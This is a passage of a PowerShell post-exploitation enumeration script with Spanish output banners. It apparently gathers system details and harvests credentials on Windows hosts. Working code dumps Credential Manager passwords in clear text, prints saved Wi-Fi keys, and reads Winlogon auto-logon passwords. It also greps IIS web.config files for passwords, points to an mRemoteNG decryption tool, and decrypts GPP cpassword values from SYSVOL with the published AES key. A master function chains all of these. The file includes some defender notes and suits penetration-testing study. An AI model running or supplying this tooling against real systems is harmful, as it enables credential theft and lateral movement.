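        return $ErrRcd
    }
    if([String]::IsNullOrEmpty($Comment))
    {
        $Comment = [String]::Format("Last edited by {0}\{1} on {2}",
                                    $Env:UserDomain,
                                    $Env:UserName,
                                    $Env:ComputerName)
    }

    [PsUtils.CredMan+Credential] $Cred = New-Object PsUtils.CredMan+Credential
    # CRED_FLAGS_USERNAME_TARGET tells the API that TargetName is itself a user
    # name and is only valid for the two DOMAIN_* types. The old check compared
    # against "CRED_TYPE_DOMAIN_PASSWORD" / "CRED_TYPE_DOMAIN_CERTIFICATE", values
    # ValidateSet never admits, so the flag was never set.
    $Cred.Flags = [PsUtils.CredMan+CRED_FLAGS]::NONE
    if($Target -eq $UserName -and
       ("DOMAIN_PASSWORD" -eq $CredType -or
        "DOMAIN_CERTIFICATE" -eq $CredType))
    {
        $Cred.Flags = [PsUtils.CredMan+CRED_FLAGS]::USERNAME_TARGET
    }
    $Cred.Type = Get-CredType $CredType
    $Cred.TargetName = $Target
    $Cred.UserName = $UserName
    $Cred.AttributeCount = 0
    $Cred.Persist = Get-CredPersist $CredPersist
    # byte count of the UTF-16 blob, which is what CredWriteW marshals
    $Cred.CredentialBlobSize = [Text.Encoding]::Unicode.GetBytes($Password).Length
    $Cred.CredentialBlob = $Password
    $Cred.Comment = $Comment

    [Int] $Results = 0
    try
    {
        $Results = [PsUtils.CredMan]::CredWrite($Cred)
    }
    catch
    {
        return $_
    }

    if(0 -ne $Results)
    {
        # deliberately no $Password here: ErrorRecords end up in $Error, transcripts and logs
        [String] $Msg = "Failed to write to credentials store for target '$Target' using '$UserName' ('$Comment')"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
        return $ErrRcd
    }
    return $Results
}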
771
772#endregion
773
774#region Cmd-Line functionality
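function CredManMain
{
<#
.Synopsis
    Runs the action selected by the credman switches.

.Description
    Reads credman's parameters ($AddCred, $DelCred, $GetCred, $ShoCred,
    $RunTests, $Target, $User, $Pass, $Comment, $CredType, $CredPersist, $All)
    through the enclosing function scope. -AddCred, -DelCred and -ShoCred
    return after their work; -GetCred falls through to the -ShoCred and
    -RunTests checks, as before.

.OUTPUTS
    -AddCred / -GetCred / -DelCred print a summary with Write-Host (clear-text
    password included) and return nothing, or return the ErrorRecord produced
    by the helper they called.
    -ShoCred emits one PSObject per credential (Username, Password, Target,
    Updated, Comment; plus Alias, AttribCnt, Attribs, Flags, Pwd Size, Storage
    and Type when -All is given). Only blobs of 4..29 characters are emitted -
    a heuristic for "looks like a typed password" that drops certificate and
    binary blobs. The old code built the -All text but never displayed it.
    -RunTests calls the C# self test, which writes and deletes a real
    credential named "Target".
#>
#region Adding credentials
    if($AddCred)
    {
        if([String]::IsNullOrEmpty($User) -or
           [String]::IsNullOrEmpty($Pass))
        {
            Write-Host "You must supply a user name and password (target URI is optional)."
            return
        }
        # may be [Int32] or [Management.Automation.ErrorRecord]
        [Object] $Results = Write-Creds $Target $User $Pass $Comment $CredType $CredPersist
        if(0 -eq $Results)
        {
            # Write-Creds falls back to the user name when no target was given; read
            # back under the same name (an empty -Target fails Read-Creds' validation).
            [String] $ReadTarget = if([String]::IsNullOrEmpty($Target)) { $User } else { $Target }
            [Object] $Cred = Read-Creds $ReadTarget $CredType
            if($null -eq $Cred)
            {
                Write-Host "Credentials for '$ReadTarget', '$User' was not found."
                return
            }
            if($Cred -is [Management.Automation.ErrorRecord])
            {
                return $Cred
            }
            [String] $CredStr = @"
Successfully wrote or updated credentials as:
 UserName : $($Cred.UserName)
 Password : $($Cred.CredentialBlob)
 Target : $($Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1))
 Updated : $([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime())) UTC
 Comment : $($Cred.Comment)
"@
            Write-Host $CredStr
            return
        }
        # will be a [Management.Automation.ErrorRecord]
        return $Results
    }
#endregion

#region Removing credentials
    if($DelCred)
    {
        if(-not $Target)
        {
            Write-Host "You must supply a target URI."
            return
        }
        # may be [Int32] or [Management.Automation.ErrorRecord]
        [Object] $Results = Del-Creds $Target $CredType
        if(0 -eq $Results)
        {
            Write-Host "Successfully deleted credentials for '$Target'"
            return
        }
        # will be a [Management.Automation.ErrorRecord]
        return $Results
    }
#endregion

#region Reading selected credential
    if($GetCred)
    {
        if(-not $Target)
        {
            Write-Host "You must supply a target URI."
            return
        }
        # may be [PsUtils.CredMan+Credential] or [Management.Automation.ErrorRecord]
        [Object] $Cred = Read-Creds $Target $CredType
        if($null -eq $Cred)
        {
            Write-Host "Credential for '$Target' as '$CredType' type was not found."
            return
        }
        if($Cred -is [Management.Automation.ErrorRecord])
        {
            return $Cred
        }
        [String] $CredStr = @"
Found credentials as:
 UserName : $($Cred.UserName)
 Password : $($Cred.CredentialBlob)
 Target : $($Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1))
 Updated : $([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime())) UTC
 Comment : $($Cred.Comment)
"@
        Write-Host $CredStr
    }
#endregion

#region Reading all credentials
    if($ShoCred)
    {
        # may be [PsUtils.CredMan+Credential[]] or [Management.Automation.ErrorRecord]
        [Object] $Creds = Enum-Creds
        if($Creds -is [Management.Automation.ErrorRecord])
        {
            return $Creds
        }
        # "-split" here was a typo for "-is"; with it the empty-store check never fired.
        if($null -eq $Creds -or ($Creds -is [Array] -and 0 -eq $Creds.Length))
        {
            Write-Host "No Credentials found for $($Env:UserName)"
            return
        }
        foreach($Cred in $Creds)
        {
            $entry = [ordered]@{
                "Username" = $Cred.UserName
                "Password" = $Cred.CredentialBlob
                "Target"   = $Cred.TargetName.Substring($Cred.TargetName.IndexOf("=")+1)
                "Updated"  = ([String]::Format("{0:yyyy-MM-dd HH:mm:ss}", $Cred.LastWritten.ToUniversalTime()))
                "Comment"  = $Cred.Comment
            }
            if($All)
            {
                # extended CREDENTIAL fields
                $entry["Alias"]     = $Cred.TargetAlias
                $entry["AttribCnt"] = $Cred.AttributeCount
                $entry["Attribs"]   = $Cred.Attributes
                $entry["Flags"]     = $Cred.Flags
                $entry["Pwd Size"]  = $Cred.CredentialBlobSize
                $entry["Storage"]   = $Cred.Persist
                $entry["Type"]      = $Cred.Type
            }
            $Credenciales_extraidas = [PSCustomObject]$entry
            # keep only blobs that look like a typed password (4..29 characters);
            # certificate, PIN and binary blobs are dropped so the table stays readable
            $blobLength = $Credenciales_extraidas.Password.Length
            if($blobLength -lt 30 -and $blobLength -gt 3)
            {
                $Credenciales_extraidas
            }
        }
        return
    }
#endregion

#region Run basic diagnostics
    if($RunTests)
    {
        [PsUtils.CredMan]::Main()
    }
#endregion
}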
932#endregion
933
# Everything above only declares helpers; the action selected by credman's
# switches actually runs here, inside credman's scope.
CredManMain
935}
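function Get-Config-Firewall {
<#
.Synopsis
    Prints the Windows Firewall configuration for all profiles.

.Description
    "netsh firewall" has been deprecated since Windows Vista and prints a
    deprecation notice (and may be unavailable) on current builds; "netsh
    advfirewall show allprofiles" is the supported equivalent and shows the
    state, default inbound/outbound action and logging settings per profile.
    The output is localized text intended for humans.
#>
    Write-Host "`n[+] ================================== Configuracion de Firewall ==================================`n"
    netsh advfirewall show allprofiles
}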
# Captured eagerly when the script is loaded (it is not inside a function), so
# every load spawns schtasks.exe and keeps its full verbose, localized listing
# in memory. Nothing in this part of the file reads $tareas - presumably a later
# section does. TODO(review): consider moving this behind a function.
$tareas = schtasks /query /fo LIST /v
function Get-DriversInstalados {
    # Third-party (provider other than "Microsoft") signed PnP drivers that
    # have a device name, as DeviceName/DriverVersion pairs.
    Get-WmiObject -Class Win32_PnPSignedDriver |
        Where-Object { $_.DriverProviderName -ne 'Microsoft' -and $null -ne $_.DeviceName } |
        Select-Object DeviceName, DriverVersion
}
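function Obtenemos-Servicios {
<#
.Synopsis
    Lists services whose ImagePath lives outside system32 and is not quoted.

.Description
    Reads HKLM\SYSTEM\CurrentControlSet\Services directly, so no service
    control rights are needed. Unquoted image paths are the usual starting
    point for an "unquoted service path" review, but this filter does not
    check for spaces in the path, so every hit still has to be confirmed by
    hand. Runs in a background job like the original; the job is now removed
    after its output has been received instead of lingering in Get-Job.
#>
    Start-Job -ScriptBlock {
        Get-ItemProperty "registry::HKLM\SYSTEM\CurrentControlSet\services\*" |
            Where-Object { $_.ImagePath -notlike "*system32*" -and $null -ne $_.ImagePath -and $_.ImagePath -notlike '*"*' } |
            Select-Object PSChildName, ImagePath |
            Format-Table
    } | Receive-Job -Wait -AutoRemoveJob
}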
function get-autologon {
    # Winlogon auto-logon values. DefaultPassword is clear text when auto-logon
    # was configured through the registry; tools that store it as an LSA secret
    # instead (e.g. Sysinternals Autologon) leave this value empty, so a miss
    # here does not prove auto-logon is off.
    $winlogon = Get-ItemProperty "registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" |
        Select-Object AutoAdminLogon, DefaultUserName, DefaultPassword, DefaultDomainName

    if ($null -eq $winlogon.DefaultPassword) {
        Write-Host "`n[+] ================================== No se han encontrado datos en AutoLogon ==================================`n"
        return
    }
    Write-Host "`n[+] ================================== Encontradas Credenciales en AutoLogon ==================================`n"
    $winlogon
}
function buscarCadena([String]$cadena , [String]$file) {
    # True when $file exists and at least one of its lines matches $cadena.
    # $cadena is used as a regular expression (-match), not a literal string.
    # A missing file or an empty pattern yields $false.
    if (-not $cadena -or -not (Test-Path -Path $file)) {
        return $false
    }
    $hits = @(Get-Content $file | Where-Object { $_ -match $cadena })
    return ($hits.Count -gt 0)
}
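function Get-Webconfig {
<#
.Synopsis
    Finds web.config files under C:\inetpub whose text mentions "pass" and prints them.

.Description
    A web.config containing "pass" usually carries a connection string or an
    appSettings entry with an embedded password. The match is a plain regex on
    each line (see buscarCadena), so expect false positives such as "passive"
    or "passthrough". Unreadable directories are skipped silently.

.Notes
    The previous version set $ErrorActionPreference to SilentlyContinue inside
    the loop and never restored it, silencing errors for the rest of the
    function; errors are now suppressed per call instead. It also matched any
    file name ending in "web.config"; only files named exactly web.config are
    considered now.
#>
    [array]$webconfigs = Get-ChildItem -Path 'C:\inetpub' -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer -and $_.Name -ieq 'web.config' } |
        ForEach-Object { $_.FullName }

    foreach ($webconfig in $webconfigs) {
        if (-not (buscarCadena -cadena "pass" -file $webconfig)) { continue }
        Write-Host "`n[+] ================================== Posible Password ==================================`n"
        Write-Host "[+] Archivo : $webconfig `n"
        Write-Host "[+] Contenido : `n"
        Get-Content -Path $webconfig -ErrorAction SilentlyContinue
    }
}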
function Get-Mremote {
    # Look for an mRemoteNG roaming-profile directory under every local user
    # profile and list the files in it. Nothing is decrypted here; the linked
    # tool is what turns the saved (encrypted) connection passwords into text.
    $profiles = Get-ChildItem -Path 'c:\users\' | ForEach-Object { $_.FullName }
    foreach ($usuario in $profiles) {
        $mremoteDir = "$usuario\appdata\Roaming\mRemoteNG"
        if (-not (Test-Path $mremoteDir)) { continue }
        Write-Host "`n[+] ================================== Encontrada configuracion de mRemoteNG ==================================`n"
        Write-Host "[+] $usuario\appdata\Roaming\mRemoteNG`n"
        (Get-ChildItem $mremoteDir).FullName
        Write-Host "`n[+] Herramienta para descifrar `nhttps://github.com/kmahyyg/mremoteng-decrypt"
    }
}
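function Get-Software {
<#
.Synopsis
    Lists the DisplayName of every program known to the Uninstall registry keys.

.Description
    Reads the 64-bit and 32-bit (WOW6432Node) machine-wide keys and the
    current user's per-user key. The original only read the 64-bit HKLM key,
    so it missed 32-bit programs on x64 and per-user installs. Entries without
    a DisplayName (patches, hidden components) are dropped instead of being
    emitted as blank lines.
#>
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    )
    foreach ($key in $uninstallKeys) {
        # WOW6432Node does not exist on 32-bit Windows; HKCU may have no Uninstall key at all
        if (-not (Test-Path -Path $key)) { continue }
        Get-ChildItem -Path $key -ErrorAction SilentlyContinue |
            ForEach-Object { $_.GetValue('DisplayName') } |
            Where-Object { -not [string]::IsNullOrWhiteSpace($_) }
    }
}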
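function Find-EventCommand {
<#
.Synopsis
    Returns the command lines recorded in Security event 4688 (process creation), optionally filtered.

.Description
    Pulls the CommandLine field (Properties[8]) of every 4688 event in the
    Security log. When -string is given the list is passed through
    Select-String, so it is a regex and MatchInfo objects come back, exactly
    as before.

.PARAMETER string
    Optional regex; when omitted every recorded command line is returned.

.Notes
    Reading the Security log requires administrative rights, and CommandLine
    is only populated when "Include command line in process creation events"
    auditing is enabled. The previous version queried every Security event
    (not just 4688, the only one where Properties[8] is a command line) and
    left a copy of all command lines in $env:TEMP\salida.txt; command lines
    frequently embed secrets, so nothing is written to disk any more.
#>
    param($string)

    # Get-WinEvent raises a non-terminating error when no event matches the filter.
    $comandos = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4688 } -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[8].Value } |
        Where-Object { -not [string]::IsNullOrEmpty($_) }

    if ($null -eq $string) {
        return $comandos
    }
    $comandos | Select-String $string
}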
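function Wifi-Password {
<#
.Synopsis
    Prints saved Wi-Fi profile names together with their clear-text keys.

.Description
    Wraps "netsh wlan show profiles" and "netsh wlan show profile ... key=clear".
    netsh prints localized labels, so the English ("Key Content") and Spanish
    ("Contenido de la clave") forms are matched by one pattern instead of
    choosing a regex from the UI language; the old check only recognised
    "es-ES" and silently found nothing on es-MX, es-AR and every other locale.
    Results stay in memory: the previous version staged them in
    $env:TEMP\wifi.txt and left that file behind whenever no key was found.

.Notes
    Other locales still need their label added to the pattern. Showing keys
    with key=clear may require administrative rights depending on who created
    the profile. netsh still runs inside a background job, as before, so a
    hang cannot block the caller; the job is removed after its output is read.
#>
    $profiles = Start-Job -ScriptBlock {
        (netsh wlan show profiles) | Select-String "\:(.+)$" |
            ForEach-Object { $name = $_.Matches.Groups[1].Value.Trim(); $_ } |
            ForEach-Object { (netsh wlan show profile name=$name key=clear) } |
            Select-String "(Key Content|Contenido de la clave)\W+\:(.+)$" |
            ForEach-Object { $pass = $_.Matches.Groups[2].Value.Trim(); $_ } |
            ForEach-Object { [PSCustomObject]@{ PROFILE_NAME = $name; PASSWORD = $pass } }
    } | Receive-Job -Wait -AutoRemoveJob

    if (@($profiles).Count -ge 1) {
        write-host "`n[+] ================================== Wifi Passwords =================================="
        $profiles | Format-Table -AutoSize
    }
}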
function Espera-Proceso {
<#
.SYNOPSIS
Blocks until no process with the given name is running.
.DESCRIPTION
Sleeps two seconds, then checks Get-Process for $proceso, and repeats while at
least one matching process exists. The first sleep always happens, even when
nothing matches. A missing process is not an error (SilentlyContinue).
.PARAMETER proceso
Process name, as accepted by Get-Process, to wait for.
#>
    param($proceso)

    do {
        Start-Sleep -Seconds 2
        $activos = @(Get-Process $proceso -ErrorAction SilentlyContinue).Count
    } until ($activos -lt 1)
}
function Get-DecryptedCpassword {
<#
.SYNOPSIS
Decrypts a Group Policy Preferences "cpassword" value to clear text.
.DESCRIPTION
The value is base64 (its padding is repaired first), AES-decrypted with the
fixed 32-byte key embedded below and an all-zero IV, and the plaintext is read
as UTF-16LE. That key is the one Microsoft documented for GPP cpassword
(MS-GPPREF), which is why any cpassword left in SYSVOL is recoverable by anyone
who can read the share; MS14-025 stopped new values being written, but existing
XML entries have to be removed by hand.
.PARAMETER Cpassword
The base64 text of the cpassword attribute from a GPP XML file.
.OUTPUTS
System.String - the clear-text password. If the AES provider cannot be created,
the still-encrypted input is returned unchanged after a warning. Any other
failure (bad base64, wrong ciphertext length, ...) is reported with Write-Error
and nothing is returned.
#>
    [CmdletBinding()]
    Param (
        [string] $Cpassword
    )

    # Decode/decrypt failures fall through to the outer catch below.
    try {

        # Base64 text must be a multiple of 4 characters. A remainder of 1 can
        # never be valid, so the stray trailing character is dropped; 2 and 3
        # are padded with '='. The string-labelled cases match the integer $Mod
        # through switch's normal comparison coercion.
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
            '2' {$Cpassword += ('=' * (4 - $Mod))}
            '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)


        try
        {
            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider -ErrorAction Stop
        }
        catch
        {
            # No provider means no decryption; hand back the encrypted input so
            # the caller still has something to show.
            Write-Warning 'Unable to decrypt cPassword is .Net 3.5 installed?'
            return $Cpassword
        }
        # Fixed 32-byte AES key published by Microsoft for GPP cpassword values.
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)


        # IV of the provider's block length, left all-zero (New-Object zero-fills
        # the array). Mode and padding are not set, so the .NET provider defaults
        # (CBC, PKCS7) apply.
        $AesIV = New-Object Byte[]($AesObject.IV.Length)
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor()
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        # Plaintext is decoded as UTF-16LE (Encoding.Unicode).
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }

    catch {Write-Error $Error[0]}
}
function Search-cpassword {
<#
.SYNOPSIS
Looks for a GPP "cpassword" attribute in the domain's SYSVOL policies and decrypts it.
.DESCRIPTION
Builds \\<domain>\sysvol\<domain>\policies\*.xml from (get-info).dominio, greps
it recursively and case-insensitively with findstr, and if there is a hit pulls
the userName and cpassword attribute values out of the matching line(s), hands
the latter to Get-DecryptedCpassword and prints file, user and clear-text
password. The file and user shown are the first ones found.
.NOTES
Defender note: this needs nothing beyond read access to SYSVOL, which every
domain user has; the remediation is to delete the cpassword entries from those
XML files. The "-ge 20" gate on $cuenta is a crude plausibility check: for a
single findstr line it is that line's character count, for several lines it is
the number of lines.
#>


    $path_sysvol = "\\" + (get-info).dominio + "\sysvol\" + (get-info).dominio + "\" + "policies" + "\*.xml"
    # findstr emits "<file>:<line>" strings. $archivo is the text before the first
    # ':' (the UNC path has no drive-letter colon); $cuenta is measured before the
    # output is split into whitespace-separated XML attribute tokens.
    $cpassword = findstr /S /I cpassword $path_sysvol; if ($cpassword -ne $null) {$archivo = ($cpassword -split ":")[0]; $cuenta = $cpassword.Length ; $cpassword = $cpassword.Split(" ")
    if ($cuenta -ge 20) {
    # Attribute tokens look like userName="x" / cpassword="y"; strip name and quotes.
    $username_cpassword = (($cpassword | Select-String "userName") -replace 'userName="','' -split '"')[0]
    $pass_cpassword = ($cpassword | Select-String "cpassword") -replace 'cpassword="','' -replace '"',""
    $password_texto_plano = Get-DecryptedCpassword -Cpassword $pass_cpassword
    Write-Host "`n[+] ============================ Encontradas Credenciales Cpass ==================================`n"
    Write-Host "[+] File = $archivo"
    Write-Host "[+] Username = $username_cpassword"
    Write-Host "[+] Password = $password_texto_plano"
    } else {}
    }
}
function Comprueba-Todo {
<#
.SYNOPSIS
Runs every check in the script in a fixed order, printing a banner before each section.
.DESCRIPTION
Entry point that chains the individual functions defined elsewhere in this file
(get-info, get-discosduros, get-configRED, get-webconfig, get-software,
get-driversinstalados, Obtenemos-Servicios, Wifi-Password, Search-cpassword,
get-autologon, get-mremote, get-config-firewall) with a few external commands
(whoami, net). Everything is written straight to the host. The Espera-Proceso
calls after "net user" and "net localgroup" wait for the spawned net.exe to
exit, presumably so its output lands before the next header; the extra sleeps
look like the same intent.
.NOTES
$banner is the script-level variable defined at the top of the file. credman is
not defined in the visible part of the script and is assumed to be in scope.
Defender note: the chain of child processes this launches (whoami /priv,
net user, net localgroup, findstr, netsh wlan) is what process-creation
auditing would show for one run of this script.
#>
    Write-Host $banner
    Write-Host "`n[+] ================================== Informacion General del Sistema ==================================`n"
    get-info
    Write-Host "`n[+] ================================== Unidades del Sistema ==================================`n"
    get-discosduros
    Write-Host "`n[+] ================================== Privilegios del CurrentUser ==================================`n"
    whoami /priv
    Write-Host "`n[+] ================================== Usuarios Locales ==================================`n"
    # net.exe runs asynchronously from the host's point of view; wait for it.
    net user ; Espera-Proceso "net" ; sleep -Seconds 2
    Write-Host "`n[+] ================================== Grupos Locales ==================================`n"
    net localgroup | Select-String "\*" ; Espera-Proceso "net"
    get-configRED
    get-webconfig
    Write-Host "`n[+] ================================== Software Instalado ==================================`n"
    get-software
    Write-Host "`n[+] ================================== Drivers de terceros ==================================`n"
    get-driversinstalados
    Write-Host "`n[+] ================================== Servicios sin Comillas =================================="
    Obtenemos-Servicios
    Wifi-Password
    Search-cpassword
    get-autologon ; sleep -Seconds 4
    get-mremote
    Write-Host "`n[+] ================================== Credenciales del sistema =================================="
    credman -ShoCred | fl
    get-config-firewall
}